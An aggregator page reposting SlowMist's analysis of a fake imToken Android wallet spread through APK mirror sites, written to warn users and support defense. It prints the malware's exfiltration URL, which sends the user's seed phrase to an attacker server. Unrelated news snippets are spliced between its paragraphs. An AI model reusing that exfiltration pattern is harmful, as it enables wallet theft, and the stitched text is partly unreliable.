月亮链 月亮链
Ctrl+D收藏月亮链
首页 > 加密货币 > 正文

WEB:慢雾:Web3假钱包第三方源调查分析_KEN

作者:

时间:1900/1/1 0:00:00

原文作者:?山&耀

技术的Web3正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处Web3世界中,钱包则是进入Web3世界的入口以及通行证。

当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包“登录”;这与我们传统意义上的“登录”不同,在Web2世界中,每个应用之间的账户不全是互通的。但在Web3的世界中,所有应用都是统一使用钱包去进行“登录”,我们可以看到“登录”钱包时显示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而钱包是你在Web3世界中的唯一通行证。

慢雾:针对传言火币信息泄漏事件不涉及用户账户与资金安全 请保持客观冷静对待:据官方消息,慢雾注意到近日有白帽子公开了此前一个火币已经处理完毕的过往漏洞信息。经慢雾与火币官方确认,火币本着负责任披露信息的策略,对本次事件做以下说明:本次事件是小范围内(4000人)的用户联络信息泄露,信息种类不涉及敏感信息,不涉及用户账户与资金安全。事件发生于2021年6月22日日本站测试环境S3桶相关人员不规范操作导致,相关用户信息于2022年10月8日已经完全隔离,日本站与火币全球站无关。本次事件由白帽团队发现后,火币安全团队2023年6月21日(10天前)已第一时间进行处理,立即关闭相关文件访问权限,当前漏洞已修复,所有相关用户信息已经删除。感谢白帽团队对于火币安全做出的贡献。最后提醒请大家冷静对待,切勿传谣。[2023/7/1 22:12:01]

俗话说高楼之下必有阴影,在如此火热的Web3世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。

慢雾:已冻结部分BitKeep黑客转移资金:12月26日消息,慢雾安全团队在社交媒体上发文表示,正在对 BitKeep 钱包进行深入调查,并已冻结部分黑客转移资金。[2022/12/26 22:08:58]

在Android环境下,由于很多手机不支持GooglePlay或者因为网络问题,很多人会从其他途径下载GooglePlay的应用,比如:apkcombo、apkpure等第三方下载站,这些站点往往标榜自己App是从GooglePlay镜像下载的,但是其真实安全性如何呢?

据数据统计站点similarweb统计,apkcombo站点:

全球排名:?1,?809?

国家排名:?7,?370?

品类排名:?168?

慢雾:Crosswise遭受攻击因setTrustedForwarder函数未做权限限制:据慢雾区情报,2022年1月18日,bsc链上Crosswise项目遭受攻击。慢雾安全团队进行分析后表示,此次攻击是由于setTrustedForwarder函数未做权限限制,且在获取调用者地址的函数_msg.sender()中,写了一个特殊的判断,导致后续owner权限被转移以及后续对池子的攻击利用。[2022/1/19 8:57:48]

我们可以看到它的影响力和流量都非常大。

它默认提供了一款chromeAPK下载插件,我们发现这款插件的用户数达到了10W:

那么回到我们关注的Web3领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?

我们拿知名的imToken钱包为例,其GooglePlay的正规下载途径为:

慢雾:BXH于BSC链被盗的ETH、BTC类资产已全部跨链转至相应链:11月3日消息,10月30日攻击BXH的黑客(BSC: 0x48c94305bddfd80c6f4076963866d968cac27d79)在洗币过程中,多次使用了 AnySwap、PancakeSwap、Ellipsis 等兑换平台,其中部分 ETH 代币被兑换成 BTC。此外,黑客现已将 13304.6 ETH、642.88 BTCB 代币从 BSC 链转移到 ETH、BTC 链,目前,初始黑客获利地址仍有 15546 BNB 和价值超 3376 万美元的代币。慢雾 AML 将持续监控被盗资金的转移,拉黑攻击者控制的所有钱包地址,提醒交易所、钱包注意加强地址监控,避免相关恶意资金流入平台。[2021/11/3 6:28:49]

https://play.google.com/store/apps/details??id=im.token.app

由于很多手机不支持GooglePlay或者因为网络问题,很多人会从这里下载GooglePlay的应用。

而apkcombo镜像站的下载路径为:

https://apkcombo.com/downloader/#package=im.token.app

上图我们可以发现,apkcombo提供的版本为24.9.11?,经由imToken确认后,这是一个并不存在的版本!证实这是目前市面上假imToken钱包最多的一个版本。

在编写本文时imToken钱包的最新版本为2.11.3?,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。

如下图,我们在apkcombo上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的GooglePlay的下载量信息,安全起见,我们觉得有必要披露这个恶意App的来源,防止更多的人下载到此款假钱包。

同时我们发现类似的下载站还有如:uptodown

下载地址:https://imtoken.br.uptodown.com/android

我们发现uptodown任意注册即可发布App,这导致钓鱼的成本变得极低:

慢雾:假钱包App已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。

我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:

根据逆向APK代码和实际分析流量包发现,助记词发送方式:

https://api.funnel.rocks/api/trust??aid=?10&wt=?1&os=?1&key=<助记词>

看下图,最早的“api.funnel.rocks”证书出现在2022-06-03?,也就是攻击开始的大概时间:

俗话说一图胜千言,最后我们画一个流程图:

交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。

同时,如需使用钱包,请务必认准以下主流钱包App官方网址:

1?/imToken钱包:https://token.im/

2?/TokenPocket钱包:https://www.tokenpocket.pro/

3?/TronLink钱包:https://www.tronlink.org/

4?/比特派钱包:https://bitpie.com/

5?/MetaMask钱包:https://metamask.io/

6?/TrustWallet:https://trustwallet.com/

请持续关注慢雾安全团队,更多Web3安全风险分析与告警正在路上。

致谢:感谢在溯源过程中imToken官方提供的验证支持。

由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。

标签:WEBTOKKENCOMweb3域名注册官网GAINZ TOKENDiw TokenSBECOM价格

加密货币热门资讯
COM:XT.COM關於MYRIA交易大賽活動結束的公告_COMFY价格

尊敬的XT.COM用戶:XT.COM交易所於2023年04月10日10:00-04月24日10:00舉辦的「MYRIA交易大賽」已圓滿結束.

1900/1/1 0:00:00
亚马逊:亚马逊与此山寨币合作:价格上涨!_BLOC

公众呺:Web3团子AltcoinCronos(CRO)已与亚马逊网络服务(AWS)合作,以支持Web3初创公司的发展。宣布合作后,Cronos(CRO)的价格上涨了13%.

1900/1/1 0:00:00
BIT:Bittrex Global CEO:公司将对美SEC的指控进行抗辩_rexchain

金色财经报道,BittrexGlobal首席执行官Oliverlynch在接受采访时表示,美国证券交易委员会(SEC)指控加密货币交易所BittrexGlobalGmbH违反了当地证券法是“错误.

1900/1/1 0:00:00
ABO:坐拥520万粉丝,美国说唱歌手Soulja boy竟是个加密子?_SOUL

原文作者:ZachXBT,链上侦探原文编译:Felix,PANews最近几周,不少KOL纷纷称赞美国知名说唱歌手Souljaboy的新NFT项目,希望借此扩大影响力.

1900/1/1 0:00:00
SHI:这三个潜力币将带给你巨大收益_RENQ

加密货币市场蓬勃发展,投资者不断寻找下一件大事。对山寨币的兴趣激增加剧了这种搜索,特别是对于具有巨大收益潜力的低价代币.

1900/1/1 0:00:00
SDT:关于部分ETF产品下架的公告_USDT

尊敬的CoinW用户:为给您提供更优质的用户权益,CoinW将对部分ETF产品进行优化,CoinW将于2023年4月27日15:00?(UTC8)暂时下架T?4L、T?4S、DPX?4L、DPX.

1900/1/1 0:00:00